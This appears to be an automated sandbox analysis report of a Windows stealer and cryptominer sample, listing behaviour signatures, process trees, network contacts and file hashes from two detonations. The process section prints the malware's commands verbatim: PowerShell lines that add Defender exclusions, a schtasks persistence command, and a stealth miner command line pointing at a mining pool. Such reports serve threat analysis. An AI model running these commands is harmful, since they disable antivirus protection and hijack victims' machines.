Malware Analysis Report

2024-11-13 14:23

Sample ID 220320-fzvv6sheb3
Target 86523374.exe
SHA256 e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
Tags
44caliber xmrig miner spyware stealer evasion persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4

Threat Level: Known bad

The file 86523374.exe was found to be: Known bad.

Malicious Activity Summary

44caliber xmrig miner spyware stealer evasion persistence

xmrig

44Caliber

XMRig Miner Payload

Executes dropped EXE

Modifies Windows Firewall

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-20 05:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win10v2004-20220310-en

Max time kernel

167s

Max time network

184s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86523374.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4624 set thread context of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 5036 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 5036 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 5036 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 5036 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4468 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 4788 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 1572 wrote to memory of 1112 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 1572 wrote to memory of 1112 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 2136 wrote to memory of 1120 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 1120 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1120 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2804 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 2804 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2804 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1120 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 4900 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 4900 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4900 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 4900 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1100 wrote to memory of 4624 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 4624 wrote to memory of 1736 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4624 wrote to memory of 1736 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1736 wrote to memory of 1904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 1904 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 2620 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 4624 wrote to memory of 2620 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1736 wrote to memory of 4156 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4156 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4624 wrote to memory of 2432 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 2620 wrote to memory of 4468 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86523374.exe

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\SysWOW64\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\system32\FonDUE.EXE

"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 2432

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2432 -s 288

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 2432

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2432 -s 332

Network

Country Destination Domain Proto
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp
US 20.189.173.2:443 tcp
US 8.8.8.8:53 freegeoip.app udp
US 188.114.97.0:443 freegeoip.app tcp
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp
NL 8.238.21.254:80 tcp

Files

memory/5036-134-0x0000000000400000-0x000000000093B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

memory/4496-139-0x00000000007A0000-0x00000000007EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

memory/4496-142-0x00007FFDDE050000-0x00007FFDDEB11000-memory.dmp

memory/4496-143-0x0000000002870000-0x0000000002872000-memory.dmp

memory/2136-144-0x0000025932E40000-0x0000025933061000-memory.dmp

memory/2136-145-0x000002594E250000-0x000002594E252000-memory.dmp

memory/2136-146-0x0000025934DA0000-0x0000025935861000-memory.dmp

memory/2136-147-0x000002594E253000-0x000002594E255000-memory.dmp

memory/2136-148-0x000002594E256000-0x000002594E257000-memory.dmp

memory/2136-149-0x0000025934D20000-0x0000025934D32000-memory.dmp

memory/1844-150-0x0000023817D90000-0x0000023818851000-memory.dmp

memory/1844-151-0x0000023817A20000-0x0000023817A22000-memory.dmp

memory/1844-152-0x0000023817A23000-0x0000023817A25000-memory.dmp

memory/1844-153-0x0000023818BC0000-0x0000023818BE2000-memory.dmp

memory/1844-154-0x0000023817A26000-0x0000023817A28000-memory.dmp

memory/1844-155-0x0000023817A28000-0x0000023817A29000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/1652-158-0x000002DE90F30000-0x000002DE919F1000-memory.dmp

C:\Windows\System32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Windows\system32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

memory/4624-164-0x000001BFBD500000-0x000001BFBD502000-memory.dmp

memory/4624-163-0x000001BFA4250000-0x000001BFA4D11000-memory.dmp

memory/4624-165-0x000001BFBD503000-0x000001BFBD505000-memory.dmp

memory/4624-166-0x000001BFBD506000-0x000001BFBD507000-memory.dmp

memory/1904-167-0x0000028B2DD40000-0x0000028B2E801000-memory.dmp

memory/1904-168-0x0000028B2D9A0000-0x0000028B2D9A2000-memory.dmp

memory/1904-169-0x0000028B2D9A3000-0x0000028B2D9A5000-memory.dmp

memory/1904-170-0x0000028B2D9A8000-0x0000028B2D9A9000-memory.dmp

memory/1904-171-0x0000028B2D9A6000-0x0000028B2D9A8000-memory.dmp

C:\Windows\system32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a2c763c5ff40e18e49ad63c7c3b0088
SHA1 4b289ea34755323fa869da6ad6480d8d12385a36
SHA256 517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
SHA512 3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

memory/4156-175-0x0000025C1D4A0000-0x0000025C1DF61000-memory.dmp

memory/4156-176-0x0000025C1E016000-0x0000025C1E018000-memory.dmp

memory/4156-177-0x0000025C1E010000-0x0000025C1E012000-memory.dmp

memory/4156-178-0x0000025C1E013000-0x0000025C1E015000-memory.dmp

memory/2432-179-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2432-180-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2432-181-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4156-182-0x0000025C1E018000-0x0000025C1E019000-memory.dmp

memory/4468-183-0x0000023B374F0000-0x0000023B374F6000-memory.dmp

memory/4468-185-0x0000023B377C0000-0x0000023B377C2000-memory.dmp

memory/4468-184-0x0000023B391E0000-0x0000023B39CA1000-memory.dmp

memory/4468-186-0x0000023B377C3000-0x0000023B377C5000-memory.dmp

memory/4468-187-0x0000023B377C6000-0x0000023B377C7000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win7-20220310-en

Max time kernel

4294221s

Max time network

172s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1124 set thread context of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Windows\explorer.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
